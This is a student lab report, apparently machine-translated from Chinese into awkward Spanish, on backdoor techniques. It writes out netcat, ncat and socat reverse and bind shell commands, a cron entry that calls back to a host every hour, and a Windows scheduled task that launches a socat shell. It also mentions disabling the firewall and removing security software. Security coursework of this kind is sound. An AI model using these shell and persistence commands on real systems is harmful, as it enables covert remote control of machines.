2019-2020-2 Principios puerta trasera 20175227 Zhang Xueying "guerra de la red Tecnología" Exp2 y Práctica

2019-2020-2 20175227 Zhang Xueying "Red contra la tecnología."

Principios puerta trasera Exp2 y Práctica

directorio

Volver a Contenido

1. contenido Experimental

1,0 de puerta trasera GENERAL
  • NCO netcat: se trata de una herramienta de fondo, el básico TCP UDPde transmisión y recepción de datos. El uso a menudo se combina con otras herramientas, desempeñar el papel de la puerta trasera.
    • Linux: Viene general netcat, " man netcat" o " man nc" para ver las instrucciones para su uso.
    • Windows: Curso de Inicio accesorios descarga ncat.rarextracto puede ser utilizado.
    • Mac: El sistema viene " man nc" para ver su uso.

      1.0.1 Win obtener Shell Linux
  • escucha por las ventanas
    • Descargar ncat.rar, descomprimir a cualquier lugar de acogida. (Para mayor comodidad, lo pongo C:\Users\S2en, por lo que puede ir directamente a la línea de comandos)
    • En la prensa principal Windows+rEnter cmdpara abrir la línea de comandos, introduzca ipconfigpara ver la dirección IP del host

  • En la ncmisma carpeta, introduzca ncat.exe -l -p <端口号>como:

  • Linux victoria conexión de rebote
    • En el kalitipo de terminal nc <主机IP地址> <之前输入的端口号> -e /bin/sh, como se muestra:

  • windowsObtenido en a linux shell, cualquier comando se puede ejecutar, como por ejemplo ls,pwd

1.0.2 Linux conseguir victorias Shell
  • Linux ejecutando el comando Oyente
    • Introduzca ip addVer Linuxdirección IP
    • Después de entrar nc -l -p <端口号>, se encuentra en un estado de escucha
  • Ventanas rebote de conexión Linux
    • entradancat.exe -e cmd.exe ip_of_linux <之前输入的端口号>
  • Ver el símbolo del sistema de Windows en Linux

1.0.3 Transmisión de datos utilizando nc
  • Windows que se ejecuta el comando Oyente

  • conexión de Linux a Windows

  • Una vez establecida la conexión de datos se pueden transmitir

Volver a Contenido

1.1 netcat obtener el huésped que opera Shell, Cron empezar
  • Abra una línea de comandos en el host, utilizando el ncat.exe -l 5227monitor de 5227puerto

  • En Linux, un terminal, introduzca crontab -eeditar un temporizador tarea, después de seleccionar el editor 3, se inserta en la fila inferior 30 * * * * /bin/netcat 192.168.171.1 5227 -e /bin/sh, es decir, la conexión inversa del huésped en los primeros 30 minutos de cada hora 5227puerto.

Volver a Contenido

1.2 Socat obtener el huésped que opera Shell, planes de comenzar la tarea
  • Descargar el maestro en el equipo host accesorio proporcionado socat.rar, y luego extraer la ruta opcional.
  • Encuentra la parte inferior izquierda ventanas banderín de esquina, el anfitrión, y luego 右键-> 计算机管理-> 任务计划程序->创建任务

  • En la 常规ficha Relleno en el Nombre de tarea (puse el nombre aquí zxysocat), a continuación, 触发器la pestaña nueva activación, seleccione la siguiente ilustración:

  • En la 操作ficha, seleccione 新建操作el ajuste para la 程序或脚本处verificación de descomprimir el archivo descargado socat.exeruta, añadir parámetros para rellenar tcp-listen:<端口号> exec:cmd.exe,pty,stderr, a punto de cmd.exeobligar al número de puerto, al mismo tiempo cmd.exela stderrredirección stdoutsucesivamente.

  • Después de determinar el funcionamiento, la regularización se win + L para bloquear el anfitrión, después de iniciar la sesión, haga doble clic en Programador de tareas de la Biblioteca, se pueden encontrar socat tarea recién creada ya se está ejecutando.

  • A continuación, en la entrada Linux socat - tcp:<主机IP>:<之前输入的端口号>, en el que la -entrada / salida estándar, un segundo puerto de flujo correspondiente al host. Después de que el descubrimiento ha obtenido con éxito unacmd Shell

Volver a Contenido

1.3 Uso de MSF meterpreter (u otro software) para generar un archivo ejecutable, o el uso NCAT socat al host y se ejecutan para obtener el anfitrión Shell

Volver a Contenido

meterpreter 1.4 MSF (u otro software) para generar el host de destino para obtener el contenido de audio, cámara, keyloggers, etc., y tratar de poner a la derecha

Volver a Contenido

1.5 plus contenido opcional: MSF generado utilizando el código shell, se vertió en 1 pwn1 en la práctica, la conexión en dos tiempos de adquisición de Shell

Volver a Contenido

2. El profesor hace una pregunta

2.1 incluyen una puerta trasera que se pueda imaginar posibles formas de entrar en su sistema?
2.2 ¿Cómo sabes que ejemplifica la puerta de atrás para poner en marcha (ganar y Linux) forma?
Que le da una función de mapeo de profundidad 2.3 Meterpreter allí?
2.4 Cómo encuentras el sistema no se ha instalado la puerta de atrás?

Volver a Contenido

3. Los problemas encontrados y sus soluciones

3.1 Pregunta 1
  • Descripción: No se puede ver Linuxla dirección IP, ifconfigel comando no se puede encontrar, como se muestra:

  • Solución: Sospecho que no está instalado con las ifconfigórdenes pertinentes del kit, después de la búsqueda en Internet para el comando net-toolsen apt-get install net-toolsla pantalla del equipo se ha instalado, como se muestra:

Después de encontrar un blog encontró que ifconfigel comando ha sido eliminado, se sugiere el uso de ip addla orden, realmente encontrado la dirección IP del resultado aquí.

3.2 Pregunta 2
  • Descripción: Linux Fallo del monitor, no pudo entrar en el shell de Windows, como se muestra:

  • Solución: supongo que probablemente debido a servidor de cortafuegos tiene su intercepción, la interceptación de la información abierta a la vista, por lo que, como se muestra:


Después de cerrar el servidor de seguridad, el software de seguridad de desinstalación, Linux entrado con éxito en el shell de Windows, los resultados aquí.

3.3 Pregunta 3
  • Descripción: execstack no se instala, como se muestra:

  • Solución: Introduzca sudo apt-get updatey sudo apt-get install execstackesperar unos momentos. ##### 3.4 Pregunta 4
    • Descripción:
    • solución:

Volver a Contenido

4. pensamientos experimentales

  • En este experimento, he experimentado a través de la práctica específicamente en el último término "tecnología de seguridad de la información" aprendido ataques de desbordamiento de búfer. Comprensión más profunda, desbordamiento de búfer ataques, en particular, cómo modificar la dirección de retorno combinará este conocimiento en lenguaje ensamblador y "Diseño de Sistemas de Información de Seguridad" aprendido algunas instrucciones, la cosecha no es realmente pequeño. En general, la prueba fue muy bien, básicamente, los problemas encontrados son simples, gracias a la maestra explicó cuidadosamente y un resumen de la tercera edad anteriores Blog, aprender deprimido tanto aprendido mucho, estado entrenando muy grande.

Volver a Contenido

5. Referencias

Volver a Contenido

Supongo que te gusta

Origin www.cnblogs.com/zxy20175227/p/12453642.html
Recomendado
Clasificación